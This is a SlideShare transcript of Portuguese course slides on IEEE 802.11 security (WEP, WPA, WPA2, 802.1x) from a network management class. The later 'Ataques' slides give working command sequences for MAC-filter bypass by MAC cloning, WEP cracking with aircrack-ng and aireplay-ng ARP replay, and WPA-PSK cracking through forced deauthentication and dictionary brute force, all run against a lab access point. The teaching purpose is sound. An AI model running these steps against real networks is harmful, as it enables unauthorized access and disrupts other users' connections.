• Save
Ataque Redes Wireless - Prática de Ataques
Upcoming SlideShare
Loading in...5
×
 

Ataque Redes Wireless - Prática de Ataques

on

  • 7,127 views

 

Statistics

Views

Total Views
7,127
Views on SlideShare
7,048
Embed Views
79

Actions

Likes
4
Downloads
0
Comments
0

2 Embeds 79

http://www.inf.poa.ifrs.edu.br 76
http://translate.googleusercontent.com 3

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Ataque Redes Wireless - Prática de Ataques Ataque Redes Wireless - Prática de Ataques Presentation Transcript

  • Tecnologia em Redes de ComputadoresGerência de RedesPrática de Ataques - wirelessProfessor: André Peresandre.peres@poa.ifrs.edu.brInstituto Federal do Rio Grande do Sul - IFRSPorto Alegre
  • Enlace IEEE 802.11Existem 3 tipos de enlaceIBSS (Independent Basic Service Set) = ad-hocBSS (Basic Service Set)ESS (Extended Service Set)
  • Enlace IEEE 802.11IBSS ou ad-hocCriada de maneira espontâneaÁrea de abrangência pequenaSem controle centralizado
  • Enlace IEEE 802.11BSSControle centralizado (AP – Access Point) • Concentrador (hub) para rede sem fios • Comutador (switch) entre enlaces com/sem fio • Área de abrangência definida pelo AP
  • Enlace IEEE 802.11ESSMúltiplos BSSsAPs se comunicam via DS (distributed system)Objetivo: roaming
  • Enlace IEEE 802.11Ligação entre redes:Pode utilizar BSS ou IBSSCom BSS • Um AP • Dois APs (um é configurado como cliente)
  • Enlace IEEE 802.11Nível de enlace IEEE 802.11 Controle de comunicação de nível físico Baseado no padrão IEEE 802.3 (ethernet) Utiliza endereços MAC compatíveis com ethernet Controle de acesso ao meio: CSMA/CA Controle de erros tipo stop-and-wait
  • Enlace IEEE 802.11Para conexão de uma estação com a redeDeve respeitar uma máquina de estados:
  • Enlace IEEE 802.11Para conexão de uma estação com a redeConfiguração da placa cliente • Tipo de rede (BSSType) – Ad-hoc – Infra estrutura (BSS) – Qualquer • Nome da rede (SSID) – Uma rede específica – Qualquer rede
  • Enlace IEEE 802.11Para conexão de uma estação com a redeConfiguração da placa cliente • Tipo de descoberta da rede (scan type) – Passivo → aguarda beacon frames – Ativo → utiliza probe request • Canal a ser utilizado (channel) – Especifica um canal 1 → 11 – Qualquer canal (faz varredura de todos em busca da rede)
  • Enlace IEEE 802.11Para conexão de uma estação com a redeA estação deve “encontrar” a rede • O AP divulga sua existência através de beacon frames
  • Enlace IEEE 802.11Para conexão de uma estação com a rede • Por segurança o AP pode não divulgar o nome da rede, obrigando a estação a utilizar probe request
  • Enlace IEEE 802.11Para conexão de uma estação com a rede • O AP responde ao Probe Request com um Probe Response:
  • Enlace IEEE 802.11Para conexão de uma estação com a redeApós a identificação do SSID e troca de mensagensiniciais • Estado 1 → Não autenticado, Não associadoPassa-se para a fase de autenticação • Padrão inicial: – Open System – Shared Key (WEP) • Adicionados Posteriormente: – PSK - Pre-Shared Key (WPA, WPA2) – 802.1x (WEP, WPA, WPA2)
  • Enlace IEEE 802.11Autenticação Open SystemAutenticação nulaQualquer estação é autenticada por padrãoProtocolo: 1 → Estação envia uma requisição de autenticação 2 → AP aceita a autenticação (sempre successfull)
  • Enlace IEEE 802.11Autenticação Shared KeyUtiliza WEP com texto desafio • O WEP utiliza criptografia simétrica (chave única)
  • Enlace IEEE 802.11Autenticação Pre-Shared KeySimilar ao Shared KeyA chave é utilizada apenas na autenticaçãoAutenticação 802.1xNecessita de um servidor RADIUSO AP serve como um NAS (Network Access Server)A comunicação ocorre entre cliente e servidor RADIUSO servidor RADIUS informa ao AP o resultado daautenticação
  • Enlace IEEE 802.11Para conexão de uma estação com a redeApós a autenticação • Estado 2 → Autenticado, Não associadoFase de associação • Passagem automática do estado 2 → 3 • Estado 3 → Autenticado, Associado • Agora a estação pode receber/transmitir quadros de enlace na rede • Acesso ao servidor DHCP, etc...
  • Segurança IEEE 802.11 A autenticação faz parte do processo desegurançaApós a autenticação, a estação passa para oestado de autenticado/associadoSomente neste estado, a estação pode trocarquadros de enlace com a rede
  • Segurança IEEE 802.11CriptografiaWEP (Wired Equivalent Privacy) • Baseia-se na dificuldade do atacante em obter um segredo compartilhado entre as estações • Utiliza criptografia simétrica – Mesma chave para cifragem e decifragem de quadros • Baseado no algoritmo RC4 – Não é uma implementação pura do RC4 – Foram feitas modificações...
  • Segurança IEEE 802.11WEP
  • Segurança IEEE 802.11WEP
  • Segurança IEEE 802.11WEPCriptografia simétrica utilizando operações XORNecessita de uma chave com o mesmo tamanho damensagem (inviável)Para contornar este problema utiliza o gerador denúmeros pseudo-aleatórios (PRNG) do RC4Funcionamento: utiliza uma SEMENTE secreta paragerar a chave de cifragem do mesmo tamanho damensagem
  • Segurança IEEE 802.11WEPA chave não pode ser reaproveitada em dois quadrosMSG [XOR] CIF → CHAVESe atacante insere ou conhece a mensagem originale captura mensagem cifrada, obtém a chave utilizada
  • Segurança IEEE 802.11WEPUtilização de chave única → problema de sincronismo!
  • Segurança IEEE 802.11WEPNecessária chave única, para cada quadro de enlaceQuadros de até 3000 bytes a 54 Mbps = muitaschaves diferentes por segundoUma semente gera uma chave...A mesma semente deve ser utilizada por todas asestações
  • Segurança IEEE 802.11WEPSolução → utilização de um vetor de inicialização emconjunto com a sementeIV (Initialization Vector) → 24 bits randômicos • Deve ser divulgado para a estação que irá decifrar o quadro
  • Segurança IEEE 802.11WEP
  • Segurança IEEE 802.11WEP
  • Segurança IEEE 802.11WEPO segredo permanece o mesmo, enquanto o IV éalterado a cada quadro de enlaceIV → 24 bitsSegredo → 5 bytes → 40 bits = WEP64Segredo → 13 bytes → 104 bits = WEP128
  • Segurança IEEE 802.11Problemas do WEPUtilização de chaves repetidasIV → 24 bits → 224 combinaçõesQuadros de 1500 bytes a 11 Mbps(1500 x 8 x 224) / (11 x 106)= 1800 segundosAproximadamente 5 horasExcluindo possibilidade de 2 máquinas utilizarem omesmo IV.... .... ...
  • Segurança IEEE 802.11Problemas do WEPOs bits permanecem na mesma posição do quadro... • Se atacante deseja alterar um bit, basta inverter o seu valor • Além disso, deve identificar a alteração no CRC32Se atacante captura uma chave, já pode gerarpacotes falsos na rede utilizando esta chave/IV
  • Segurança IEEE 802.11Problemas do WEPPesquisa de Fluhrer, Mantin, Shamir “Weaknesses in the key scheduling Algorithm of RC4”Possíveis chaves fracas no PRNG do RC4Ao utilizar uma chave fraca, identifica bits da sementeO WEP utiliza muitas sementes diferentes, gerandomuitas chaves fracas
  • Segurança IEEE 802.11Problemas do WEPProgramas WEPCrack e AirSnort Total de pacotes: 2,5 milhões Pacotes “interessantes”: 1878 Segredo: xC513
  • Segurança IEEE 802.11Problemas do WEPProgramas WEPCrack e AirSnort Total de pacotes: 7,3 milhões Pacotes “interessantes”: 4160 Segredo: xCd513ewq1pkm
  • Segurança IEEE 802.11Problemas do WEPAnálise dos bits iniciais de uma mensagem cifrada • O LLC inclui sempre os mesmos bits: 0xaaInferir através de análise probabilística os bits dasemente (os primeiros bits são o IV)Isto facilita a descoberta dos demais bits da semente(segredo compartilhado)
  • Segurança IEEE 802.11WPA (Wi-fi Protected Access)Após descoberta das vulnerabilidades WEPCriado grupo de trabalho IEEE 802.11i • Responsável pelo novo protocolo de segurança 802.11 • Reuniões entre fabricantes e comunidade científicaFornecedores preocupados • Demora com 802.11i • Criada Wi-Fi Alliance • Necessidade de compatibilidade com hardware antigo • Apenas atualização de firmware
  • Segurança IEEE 802.11WPA (Wi-fi Protected Access)Para manter o hardware → novo esquema rodandosobre protocolo antigo (WEP)Protocolo WPA (ano: 2002) • Mantém o WEP • Contém mecanismo de troca de segredo (parte da semente além do IV) periodicamente → TKIP (Temporal Key Integrity Protocol) • Permite autenticação via PSK ou 802.1x
  • Segurança IEEE 802.11WPA (Wi-fi Protected Access)MICHAEL • Substitui o CRC32 para verificação de integridade de mensagens • Gera um cálculo de 64 bits • Serve para impedir que um atacante consiga inserir quadros em uma rede cifrada
  • Segurança IEEE 802.11WPA (Wi-fi Protected Access)TKIP • Troca dinâmica de segredo • Necessita de um novo mecanismo de autenticação • Como o segredo é trocado, não pode utilizar a chave dinâmica como autenticação (o cliente não conhece a chave)PSK (Pre-Shared Key) • Chave “mestra” utilizada no processo de autenticação • Utilizada inicialmente para ingresso na rede • Após autenticação, estação recebe a chave que está sendo utilizada pelas demais estações na rede
  • Segurança IEEE 802.11WPA (Wi-fi Protected Access)PSK (Pre-Shared Key) • É o ponto pelo qual um atacante tenta obter acesso à rede • Atacante captura processo de autenticação e tenta identificar a PSK utilizada neste processo • Ao obter a PSK, consegue entrar na rede • Como o número de quadros trocados na autenticação é pequeno, o ataque deve ser baseado em força bruta • Força bruta → dicionário de senhas + software de análise da autenticação WPA
  • Segurança IEEE 802.11WPA + 802.1x • Alternativa ao PSK • Não possui chave inicial • Usuário deve se autenticar com servidor RADIUS – PEAP (usuário/senha) – Certificado – … • Necessário servidor RADIUS • AP serve como ponte entre estação e RADIUS
  • Segurança IEEE 802.11802.1x • Baseado no conceito de “portas” – Enquanto a estação não finaliza o processo de autenticação fica com a “porta” para a rede fechada – A única comunicação permitida é com o servidor RADIUS – Apenas no final da autenticação com sucesso (indicada pelo servidor RADIUS para o AP) o AP libera o acesso • Processo de autenticação ocorre no nível de enlace
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x
  • Segurança IEEE 802.11802.1x • No caso de uso de certificados, apenas quem possui certificado válido (CA) pode acessar a rede • No caso de EAP, verificado usuário/senha – Possibilidade de força bruta • O AP é autenticado junto ao RADIUS, impedindo AP falso • Possibilidade de ataques com AP+RADIUS falsos – Atacante realiza a autenticação do cliente – Não funciona com TLS (autenticação mútua AP ↔ Estação) via certificados
  • Segurança IEEE 802.11WPA2 (IEEE 802.11i)Ano: 2004Substituição total do protocolo criptográficoUtilização do AES(Advanced Encryption Standard) • Robusto • Sem ataques à criptografia conhecidos • Padrão de criptografia adotado por diversos softwares/equipamentosIncompatível com equipamentos anterioresAutenticação via PSK e 802.1x, Criptografia AES
  • Segurança IEEE 802.11Na práticaWEP → fora !Usuário doméstico/SOHO: • Equipamentos antigos ( → 2004): WPA/PSK • Equipamentos novos (2004 → ): WPA2/PSKUsuário empresarial: • Equipamentos antigos ( → 2004) : WPA/802.1x • Equipamentos novos (2004 → ) : WPA2/802.1x
  • AtaquesVisão do atacante:1. criptografianenhumaWEPWPAWPA-2
  • AtaquesVisão do atacante:2. autenticaçãonenhumashared-keyPSK802.1x
  • AtaquesVisão do atacante:3. mecanismos adicionaisnenhumFiltro MACSSID escondidoMecanismos layer 3 (firewall, etc...)
  • AtaquesCenários de testes:1 – AP com SSID escondido e filtro de MACAtaque: captura de probes + clonagem deMAC2 – WEPAtaque: quebra do WEP via software3 – WPAAtaque: desconexão de um cliente + capturade autenticação + força bruta
  • Ataques1 – AP com SSID escondido e filtro de MACAtaque: captura de probes + clonagem deMACPassos:Descoberta do SSID:- colocar a placa de redes sem fios em modomonitor- capturar tráfego via wireshark, tcpdump,etc....
  • Ataques1 – AP com SSID escondido e filtro de MACConfigurando o AP
  • Ataques1 – AP com SSID escondido e filtro de MACObtendo o nome da rede:# ip l s wlan0 down# iwconfig wlan0 mode monitor# iwconfig wlan0 channel 8# ip l s wlan0 upExecutar o wireshark e aguardar os “probes”
  • Ataques1 – AP com SSID escondido e filtro de MACObtendo o nome da rede:
  • Ataques1 – AP com SSID escondido e filtro de MACBuscar por pacotes de probe (OK)Buscar pelo MAC address de uma estação queestá navegandoIdentificar faixa de endereços IP utilizados ebuscar por um IP que não está sendo usadoObjetivo:Mesmo MAC, IP diferente....
  • Ataques1 – AP com SSID escondido e filtro de MACConfigurando o AP
  • Ataques1 – AP com SSID escondido e filtro de MACObtendo o MAC de uma estação da rede:- placa em modo monitor- wireshark...
  • Ataques1 – AP com SSID escondido e filtro de MACObtendo o MAC de uma estação da rede:
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC: Atacante Alvo ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico
  • Ataques1 – AP com SSID escondido e filtro de MAC Alvo envia um quadroClonagem de MAC: AP verifica MAC origem Atacante Alvo OK ! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D OK ! 11:11 AA:AA 10.1.1.2 200.1.1.1
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC: Atacante Alvo Volta a resposta ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC: As duas placas de Atacante Alvo rede aceitam... e repassam para o IP ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • Ataques IP destino = 10.1.1.1?1 – AP com SSID escondido e filtro de MAC NÃO ! Eu sou um roteador?Clonagem de MAC: NÃO ! Atacante Alvo → descarta o pacote !!! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC:Ou seja...Duas máquinas com mesmo MAC e IPsdiferentes podem “navegar” simultaneamente(layer3)… afinal é possível ter uma máquina com maisde um IP vinculado na mesma placa de rede....
  • Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: # killall nm-applet # ip l s wlan0 down # ip l s wlan0 address 00:1b:77:b9:51:49 # ip a a 10.1.0.200/24 dev wlan0 # ip l s wlan0 up # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8# tail -f /var/log/syslog---------------------------------kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7ekernel: [ 225.757365] wlan0: beacon receivedkernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1)kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401status=0 aid=1)kernel: [ 225.785943] wlan0: associated
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC e associação com AP:- não utilizar o serviço de DHCP...- configurar na mão:→ roteador default→ servidor de DNS
  • Ataques1 – AP com SSID escondido e filtro de MACClonagem de MAC e associação com AP:
  • Ataques2 – Quebra de WEP via softwareVulnerabilidade – PRNG do RC4 gerandochaves fracas...Técnica:1. captura de pacotes cifrados com diferentesIVs2. análise dos pacotes (software) paraobtenção do segredo compartilhado
  • Ataques2 – Quebra de WEP via softwarePassos:1. colocar a placa de rede em modo monitorpara captura do tráfego cifrado:# ip l s wlan0 down# iwconfig wlan0 mode monitor# iwconfig wlan0 channel 8# ip l s wlan0 up
  • Ataques2 – Quebra de WEP via softwarePassos:2. instalação do software aircrack-ng# apt-get install aircrack-ng3. captura do tráfego (descoberta das redes)# airodump-ng wlan0
  • Ataques 2 – Quebra de WEP via software Passos: 4. em outro terminal – captura do tráfego cifrado de uma rede específica para posterior análise# airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1wlan0 5. para diminuir tempo, geração de tráfego (requisição de autenticação com o AP)# aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62wlan0
  • Ataques 2 – Quebra de WEP via software Passos: 6. captura da requisição de autenticação (os pacotes ARP) e repetição dos mesmos para geração de mais tráfego# aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62wlan0 7. Após obter um número significativo de pacotes, tentar a análise... # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
  • Ataques2 – Quebra de WEP via softwareObs: necessário grande volume de tráfegopara análise...porém, com tráfego suficiente, sempre seconsegue o segredo compartilhado
  • Ataques3 – Quebra de WPA via softwareVulnerabilidade:Mesmo protocolo de autenticação do WEPquando utilizado PSKTécnica:Obtenção dos quadros de associação eposterior força bruta na PSK
  • Ataques 3 – Quebra de WPA via software Passos: 1. colocar a placa de rede em modo monitor 2. monitorar com airodump-ng 3. captura de pacotes cifrados (especificar WPA)# airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
  • Ataques 3 – Quebra de WPA via software Passos: 4. força a desautenticação de um cliente para captura dos quadros de autenticação (falsifica mensagem de desaut. do AP)# aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0 5. utiliza força bruta (dicionário) para tentar obter PSK # aircrack-ng -w dicionario.txt wpa1-01.cap